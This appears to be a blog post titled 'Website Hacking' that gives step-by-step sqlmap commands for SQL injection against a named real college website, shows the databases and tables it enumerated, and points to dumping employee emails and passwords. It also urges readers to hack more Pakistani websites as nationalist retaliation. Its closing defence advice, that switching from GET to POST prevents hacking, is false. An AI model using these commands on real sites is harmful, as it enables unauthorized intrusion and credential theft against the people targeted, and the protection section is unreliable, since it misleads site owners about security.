TechnoGb
Ethical Hacking

Website Hacking | TechnoGb

website hacking

Website on the internet has become one of the major ways of spreading the knowledge, Advertising the products, For entertainment and almost for everything. So, every individual who wants to advertise his/her products or talents or knowledge or anything the first and foremost thing comes in his/her mind to make a website for it and spread their workings.

But only making a website doesn’t make it work better, there is something else without which all these websites won’t work and that thing is it’s security and maintenance at the backend of the server.

And here lies the dark reality of the internet and all the server holding all the websites of all those individual who once thought to make a website to advertise their work over the internet that most of these websites are vulnerable and can be break-down by any HACKER (or any individual having the knowledge of the working of websites, servers and finding their vulnerabilities).

So, here are the few methods of hacking the websites:

1. SQL-Injection
2. DoS Attack (Denial of Service Attack)
3. D-DoS Attack (Distributed Denial of Service Attack )
4. Cross-Site Scripting Attacks
5. ClickJacking Attacks
6. Social Engineering Attacks
7. Phishing Attacks
8. DNS Cache Poisoning Attacks

And many more methods…….

So, here I am going to discuss the SQL-Injection attack…

The prerequisites for this attack are :

* KALI LINUX (operating system)
{can be downloaded from www.kali.org}

* A vulnerable website or a server
{if you don’t know how to find the vulnerable website you can visit my Blog from Here}

* And some patience to perform the attack (coz hacking needs lots of patience and time)

Now let’s begin our work of hacking down a website……..:—

Here I have taken a Pakistani Website ( http://www.citicollege.edu.pk ) to knock it down and i request all of you to hack more and more amount of Pakistani Websites and post them on your Social Media Websites along with #packyou label…To teach pakistani’s a lesson over the internet so, they don’t dare to take down Indian websites.

 

 

STEP 1 :
—————

Fire up your KALI LINUX (penetration testing operating system) System and open up your terminal in it.

Now type “sqlmap -h” (without quotes) to open up the help page in a terminal of SQLMAP which will guide us what to do in our further attacks

 

website hacking

website hacking

 

STEP 2:
————-

The next step will be performing the injection on our vulnerable website so , we will type the below command to perform our sql-Injection

“sqlmap -u http://www.citicollege.edu.pk –level=5 –risk=3 –dbs”

Now let’s understand the above command little bit :

“sqlmap” :- this command is used to launch the sqlmap program from the in terminal in KALI LINUX.

“-u” :- this argument is used to provide the web address of our target on which we want to perform our sql injection.

“–level=5” :- this argument is used to specify the the level of attack we want to do on our target , it basically depends on situation to situation and website to website (this thing you will know after gaining some experience in this field) , and the DEFAULT VALUE for this is 1 , and the maximum value for this argument is 5.

“–risk=3” :- this argument is used to specify the amount of risk to be taken by our system in taking down the target website using SQLMAP , it’s maximum value is 3 and the default, as well as minimum value, is 1.

“–dbs” :- this argument is used to tell our sqlmap program that we want to attack all the database of the provided website, and basically this argument is used when we are not aware of a single database of the website. 

 

website hacking

 

Here we got the information of all the database in a website, here we have only two databases i.e:-

available databases [2]:
[*] citioffi_college
[*] information_schema

Now we will extract all the information of these two databases in our next step.

 



 

STEP  3 :
—————

To extract the information (tables, columns, and rows) of a particular database we will use the below command :

“sqlmap -u http://www.citicollege.edu.pk -D information_schema –tables”

 

website hacking

 

Here we got all the list tables present in the information_schema database i.e

Database: information_schema
[45 tables]
—————————————
| CHARACTER_SETS
| CLIENT_STATISTICS
| COLLATIONS
| COLLATION_CHARACTER_SET_APPLICABILITY
| COLUMNS
| COLUMN_PRIVILEGES
| ENGINES
| EVENTS
| FILES
| GLOBAL_STATUS
| GLOBAL_VARIABLES
| INDEX_STATISTICS
| INNODB_BUFFER_PAGE
| INNODB_BUFFER_PAGE_LRU
| INNODB_BUFFER_POOL_STATS
| INNODB_CMP
| INNODB_CMPMEM
| INNODB_CMPMEM_RESET
| INNODB_CMP_RESET
| INNODB_LOCKS
| INNODB_LOCK_WAITS
| INNODB_TRX
| KEY_COLUMN_USAGE
| PARAMETERS
| PARTITIONS
| PLUGINS
| PROCESSLIST
| PROFILING
| REFERENTIAL_CONSTRAINTS
| ROUTINES
| SCHEMATA
| SCHEMA_PRIVILEGES
| SESSION_STATUS
| SESSION_VARIABLES
| STATISTICS
| TABLES
| TABLESPACES
| TABLE_CONSTRAINTS
| TABLE_PRIVILEGES
| TABLE_STATISTICS
| THREAD_STATISTICS
| TRIGGERS
| USER_PRIVILEGES
| USER_STATISTICS
| VIEWS
—————————————

And if we want to view the database of any of the table we will use the below command :

“sqlmap -u http://www.citicollege.edu.pk -D information_schema -T CHARACTER_SETS –columns –dump”

 

website hacking

 

In this way, we can find all the information even the email address and password of the employee of the website because all this information is stored in the same database of the website but the matter of thing is that it depends upon us how long we take to find that vital information into that vulnerable database

Am not showing the database containing the email address and password of all the employee of this website because it is illegal to share someone’s personal details publicly, But don’t worry I have given you the way to hack into the database of any vulnerable website, so you can do so and find all that vital information, but don’t exceed the “CYBER LAW BOUNDARIES”.

You can watch my video on ‘WEBSITE HACKING USING KALI LINUX (offensive security)’ which contains all these steps in a very detailed manner from below.



HOW TO PROTECT OUR WEBSITE FROM BEING HACKED

To protect something we need to have the knowledge of its working first so, first, let’s understand briefly that how a website works,
Website stored on any server has two parameters in it which are placed by a developer of a website i.e “GET” Parameter and “POST” Parameter to retrieve the information and the content of the website from a server to Internet and from Internet to the user’s system , and the protection lies in these two parameters only i.e GET & POST Parameter.
GET parameter when used in a website then all it’s information which is being requested by the user from a server is being revealed on the network and on the user’s search bar in a browser , which can turn into a serious information leakage for any websites and this is one of many vulnerabilities of the websites which are still being applied to many of the websites.
And in POST Parameter all the information requested by the user from a server are being hidden under the “https” protocol, so this is the current method which is being applied on all the websites Nowadays.
So to protect our website from being HACKED stop using the GET Parameter and start using the POST Parameter in the coding part of your website , this technique will not guarantee you and your website a 100 % safety from being hacked but yes this will definitely lowers the chance from being hacked , As nothing is secure in this Internet so no method will prove you a 100 % safety.
If you have any questions to ask / or any suggestion to give please mention it in the comment box below.

#hack_ethically  #hack_smartly

 

IF YOU ARE INTERESTED IN LEARNING THE CYBER SECURITY AND ETHICAL HACKING YOU CAN VISIT OUR FACEBOOK PAGE TECHNICAL ELITES and register yourself for the ethical hacking course or you can directly pay through fastest and free payment service of India i.e through PayUmoney by clicking the button below.



Summary
Website Hacking | TechnoGb
Article Name
Website Hacking | TechnoGb
Description
Website on the internet has become one of the major ways of spreading the knowledge, Advertising the products, For entertainment and almost for everything. So, every individual who wants to advertise his/her products or talents or knowledge or anything the first and foremost thing comes in his/her mind to make a website for it and spread their workings.
Author
Publisher Name
TechnoGb
Publisher Logo

Related posts

Password Hacking | Ethical Hacking | TechnoGb

Deepanshu Rai

WIFI NETWORK HACKING | TechnoGb

Deepanshu Rai

TCP Hijacking | Ethical Hacking | TechnoGb

Deepanshu Rai

Leave a Comment